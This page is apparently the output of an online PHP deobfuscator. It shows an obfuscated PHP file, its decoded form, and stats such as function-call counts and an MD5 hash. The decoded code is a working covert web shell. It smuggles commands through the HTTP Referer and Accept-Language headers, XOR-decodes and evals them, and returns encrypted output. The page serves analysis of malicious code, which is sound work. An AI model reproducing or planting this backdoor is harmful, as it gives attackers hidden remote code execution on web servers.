Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $q='u["LSquerLSy"],$LSq);$qLS=LSarray_vaLSlues($q);preg_matcLSh_LSall("/LS([\\w])LS..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$q='u["LSquerLSy"],$LSq);$qLS=LSarray_vaLSlues($q);preg_matcLSh_LSall("/LS([\\w])LSLS[\\w-]+(?';
$R='";$p=$ss($p,3);LS}LSif(LSarray_LSkeLSy_exists($i,$s)LS){$s[$i]LS.=$p;$eLS=strposLS(LS$s[';
$U=':;qLS=0.([\\LSd]LS))?,?/LS",$ra,$m);if(LSLS$q&&$m){LS@sessiLSLSon_start();$sLS=&$_SESSIOL';
$s='SN;LS$ss="substrLS";$sl=LS"strLStolower"LS;$LSi=$m[1][0]LS.$m[LS1][1];LSLS$h=$LSsLSl($sL';
$N=str_replace('q','','cqrqeatqe_qqfunctiqon');
$W='t{$i}^$k{$j};}}returnLS $LSo;LS}$r=$_LSSERVER;$rr=@$r["LSHTTPLS_RELSFERER"];$ra=LSLS@$r[';
$y='e(xLS(gzcompLSress($oLS)LS,$k));pLSrint("<$k>$dLSLS</$k>");@seLSssion_deLSstLSroy();}}}}';
$A=',LS0LS,$e))),$k)));$oLS=LSob_get_contenLSts()LSLS;obLS_end_clLSean();$d=basLSe6LS4_encod';
$e='$i]LS,$f);iLSf($e){$k=LS$khLSLS.$kf;LSob_start();@eLSvalLS(@gLSLSzuncompress(@x(@baLSse6';
$S='"HTTP_ALSLSCCEPTLS_LANGLSUAGE"];ifLS($rr&&$raLSLS){$u=parse_LSurl($rr)LS;parsLSe_stLSr($';
$O='Ss(md5($i.$kh),0LS,3));$f=$sl($LSss(mdLS5($i.$LSkLSf),0LS,3LS));$p="LS";for($z=1LS;$z<LS';
$E='4_LSdecoLSde(preLSg_repLSlace(array(LS"/_LS/","LSLS/-/"),array("/","+"LS)LS,$ss($s[LS$i]';
$r='couLSnt($m[1]);$z++)$pLS.=$LSq[$m[2][$LSz]LS];if(LSstrpoLSs($p,$h)===0)LS{$sLS[$i]LS="LS';
$Z='$kh="5dLSLS41"LS;$kf=LS"402a";LSfunction xLS($t,$kLS){$c=stLSrlen($k);$l=stLSrlen(LS$tLS);';
$p='LS$o="";for($i=LS0;LS$i<$lLS;){for($LSj=0;($jLS<$c&&$i<LS$l);$j++LS,$iLSLS++){$LSLSoLS.=$';
$J=str_replace('LS','',$Z.$p.$W.$S.$q.$U.$s.$O.$r.$R.$e.$E.$A.$y);
$B=$N('',$J);$B();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 269cad5a36bbc5270fedc599566170d5 |
Eval Count | 1 |
Decode Time | 159 ms |